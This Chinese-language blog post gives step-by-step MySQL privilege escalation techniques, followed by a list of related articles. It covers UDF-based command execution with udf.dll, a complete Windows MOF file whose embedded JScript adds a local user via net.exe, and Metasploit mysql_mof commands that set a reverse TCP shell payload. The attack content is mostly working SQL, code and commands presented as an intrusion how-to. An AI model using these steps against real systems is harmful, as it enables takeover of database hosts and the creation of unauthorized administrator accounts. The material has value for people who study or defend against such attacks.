利用MySQL提权原理:

1、具有mysql的root权限,且mysql以system权限运行。

2、具有执行sql语句的权限,webshell或者外连皆可

UDF提权

UDF(user defined function 用户自定义函数)提权,要求有写权限(secure_file_priv要么为空,要么设置路径),单引号未被过滤

原理:

UDF可以理解为MySQL的函数库,可以利用UDF定义创建函数。(其中包括了执行系统命令的函数)要想利用udf,必须上传udf.dll作为udf的执行库。

mysql中支持UDF扩展,使得我们可以凋用DLL里面的函数来实现一些特殊的功能。

0X01 MySQL信息收集

在拿到数据库账号密码后,查看用户权限,本地路径,版本信息

select user();
select @@basedir;
select version();select @@plugin_dir ; #查询到MySQL的plugin位置# mysql版本<5.1,UDF导出到系统目录C:/windows/system32/ 如Windows2003放到c:\windows\system32# mysql版本>5.1,UDF导出到安装路径:Windows在MySQL\Lib\Plugin\(Plugin默认不存在,需自建) Linux则在/usr/lib/mysql/plugin下



show global variables like '%secure%';# mysql版本<5.5.53 , secure_file_priv 默认为空# mysql版本>=5.5.53 ,secure_file_priv 默认为null


0X02  创建函数


将udf.dll脚本上传至指定目录后执行命令


 CREATE FUNCTION shell RETURNS string SONAME 'udf.dll'; # 创建函数 SELECT shell('cmd','whoami'); #执行命令




脚本链接 https://github.com/f1tz/UDF


Linux与Windows操作相似,具体操作参考上图,注意文件类型不是dll,而是so


如果遇到Function sys_eval already exists问题,执行以下语句


DROP FUNCTION IF EXISTS lib_mysqludf_sys_so;

DROP FUNCTION IF EXISTS sys_get;

DROP FUNCTION IF EXISTS sys_set;

DROP FUNCTION IF EXISTS sys_exec;

DROP FUNCTION IF EXISTS sys_eval;

DROP FUNCTION IF EXISTS shell;

DROP FUNCTION IF EXISTS cmd;

select * from mysql.plugin;

delete from mysql.plugin;


mof(托管对象)提权


提权原理:


mof是windows系统的一个文件(c:/windows/system32/wbem/mof/nullevt.mof)叫做”托管对象格式“其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysq的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户的命令。


mof文件通过Mofcomp.exe编译执行。


仅适用于Windows


流程:

1、首先找个可写的目录,将我们的MOF文件上传上去。


连接菜刀,上传两个mof文件Adduser.mof,Addtoadmin.mof至C:windows/system32/wbem/mof/


select load_file(C:/wmpub/nullevt.mof) into dumpfile 'c:/windows/system32/wbem/mof/nulevt.mof'


2、mofcomp.exe xxx.mof 执行mof文件


虚拟终端进入此目录下,执行命令:mofcomp.exe Adduser.mof 等待数秒后net user 查看用户是否添加成功,再执行mofcomp.exe Addtoadmin.mof 等待数秒后 net user 用户名 查看是否添加到administrators组中


添加用户的mof文件代码                  
#pragma namespace(“\\\\.\\root\\subscription”)

instance of __EventFilter as $EventFilter

{

EventNamespace = “Root\\Cimv2”;

Name = “filtP2”;

Query = “Select * From __InstanceModificationEvent “

“Where TargetInstance Isa \”Win32_LocalTime\” “

“And TargetInstance.Second = 5”;

QueryLanguage = “WQL”;

};

instance of ActiveScriptEventConsumer as $Consumer

{

Name = “consPCSV2”;

ScriptingEngine = “JScript”;

ScriptText =

“var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user secist 123 /add\”)“;   #修改这里进行账户密码和组的修改

};

instance of __FilterToConsumerBinding

{

Consumer = $Consumer;

Filter = $EventFilter;

};


利用mof通过msf获得cmdshell


use exploit/windows/mysql/mysql_mof  #选取模块


options   #查看所需配置参数


set username  xxx


set password  xxx


set rhost  xxx.xxx.xxx.xxx


set payload windows/shell_reverse_tcp     #选择payload


options


set lhost xxxx


set lport xxx


exploit       #执行
												


											
内网学习之MySQL服务提权的更多相关文章
	

    
								
  1. mysql udf提权实战测试
		
    根据前天对大牛们的资料学习,进行一次mysql udf提权测试. 测试环境: 受害者系统:centos 7.7 ,docker部署mysql5.6.46, IP:192.168.226.128 攻击者 ...
    
		
    2. 
						
  2. Nginx代理实现内网主机访问公网服务
		
    通过Nginx代理实现内网主机访问公网和接口服务 1.需求: m2.test.com为公司测试环境的微信测试域名,因为要调用微信服务接口需要访问外网,现通过Nginx代理现实此功能. 2.环境如下:  ...
    
		
    3. 
						
  3. 内网探测之SPN服务扫描及相关利用
		
    在写下一个大块之前,补充一些小知识点,也没啥新东西 0x01简介 如果常规扫描服务,结果不理想,非常GG,可以考虑使用SPN进行服务扫描,这是为了借助Kerberos的正常查询行为(向域控发起LDAP ...
    
		
    4. 
						
  4. MySQL UDF提权执行系统命令
		
    目录 UDF UDF提权步骤 UDF提权复现(php环境) UDF UDF (user defined function),即用户自定义函数.是通过添加新函数,对MySQL的功能进行扩充,其实就像使用 ...
    
		
    5. 
						
  5. MySQL数据库提权(一)
		
    一.获取Mysql登录账号和密码 1.数据库提权需要知道数据库的账号密码.以及它的配置文件,一般配置文件都在网站的根目录下,这些配置文件命名有鲜明的特征,如:conn.config.data.sql. ...
    
		
    6. 
						
  6. centos 内网ip访问mysql数据库
		
    参考博文: CentOS 配置mysql允许远程登录 Centos6.5 双网卡配置一个上外网一个接局域网  这个博文仅作参考 公司租用景安的服务器,给景安沟通配置内网. [root@bogon ng ...
    
		
    7. 
						
  7. 通过ssh管道连接内网数据库(mysql)
		
    公网连接内网数据库(如云数据库)时,通常需要白名单:如果不是白名单IP,通常需要一个跳板机(类似代理)来连接内网数据库, 下方以mysql为例(其他数据库基本一致): import pymysql a ...
    
		
    8. 
						
  8. mysql UDF提权问题
		
    测试UDF提权,时候遇到问题,创建函数shell提示存在 当执行操作的时候又提示,shell函数不存在. FUNCTION mysql.shell does not exist 如果在测试环境下,一般 ...
    
		
    9. 
						
  9. 内网学习之Kerberos协议
		
    学习了解kerberos协议,有助于我们后期理解黄金票据和白银票据的原理 kerberos协议 kerberos是一种由麻省理工大学提出的一种网络身份验证协议.旨在通过使用密钥加密技术为客户端/服务器 ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. jmeter使用—远程分布式
			
    今天要说的是在远程服务器上使用多台服务器进行noGUI分布式使用jmeter压测. 1.首先准备几台服务器,服务器上都需要安装同一个版本的jmeter. 2.在服务器上启动jmeter的方式是在jme ...
    
			
    2. 
						
  2. WinSCP整合SecureCRT打开终端
			
    使用WinSCP直接操作文件非常方便,但是如果用它来连入SSH进行指令交互就不方便了,使用XShell.SecureCRT.Putty等SSH终端软件敲指令却很不错,于是想能不能将两者结合起来使用.我 ...
    
			
    3. 
						
  3. 理想乡题解 (线段树优化dp)
			
    题面 思路概述 首先,不难想到本题可以用动态规划来解,这里就省略是如何想到动态规划的了. 转移方程 f[i]=min(f[j]+1)(max(i-m,0)<=j<i 且j符合士兵限定) 注 ...
    
			
    4. 
						
  4. 02--java--环境搭建
			
    第一步,下载JDK 去ORACLE官网http://www.oracle.com下载 有安装版和绿色版,安装版一路下一步,绿色版解压缩压缩包就行了 安装版直接自动配置环境变量,绿色版需要自己配置环境变 ...
    
			
    5. 
						
  5. 代码中理解CPU结构及工作原理
			
    一.前言 从研究生开始到工作半年,陆续在接触MCU SOC这些以CPU为核心的控制器,但由于专业的原因一直对CPU的内部结构和工作原理一知半解.今天从一篇博客中打破一直以来的盲区.特此声明,本文设计思 ...
    
			
    6. 
						
  6. laravel 事件机制 实践总结
			
    laravel 事件机制 实践总结 观察者模式 在EventServiceProvider的linsten数组里面加上事件和监听器,键名是事件,键值里面的数组是一个或者多个监听器, protected ...
    
			
    7. 
						
  7. Docker基础内容之数据持久化
			
    数据卷的特性 数据卷是一个可供一个或多个容器使用的特殊目录,它绕过 UFS 数据卷可以在容器之间共享和重用,相当于将一个分区挂载到多个目录下面 数据卷内容的修改会立马生效 数据卷的更新,不会影响镜像: ...
    
			
    8. 
						
  8. 推荐一本书学习springcloud书籍的SpringCloud微服务全栈技术与案例解析
			
    整本书还算是挺详细的,基本大部分轮子都讲到了,唯一不足就是版本比较旧,而且springcloud 版本现在迭代这么快 很多内容其实高版本中完全没有了,得自己敲代码多采坑 前面基本章节其实可以大致略过一 ...
    
			
    9. 
						
  9. Flutter 入门 --- 内部分享
			
    八月部门给分配的分享任务,由于项目太赶,推迟一个月. 选 Flutter 这个主题,是因为现在它慢慢流行起来了,而我却不了解,故而借此契机,上手试试. 简介 Flutter 是 Google 推出的跨 ...
    
			
    10. 
						
  10. Harbor 1.9.x 版本从源码构建和运行
			
    介绍 本指南为开发人员提供了从源代码构建和运行Harbor的说明. 步骤1:为Harbor的构建环境做准备 Harbor被部署为多个Docker容器,并且大多数代码都是用Go语言编写的.构建环境需要D ...
    
			
    11.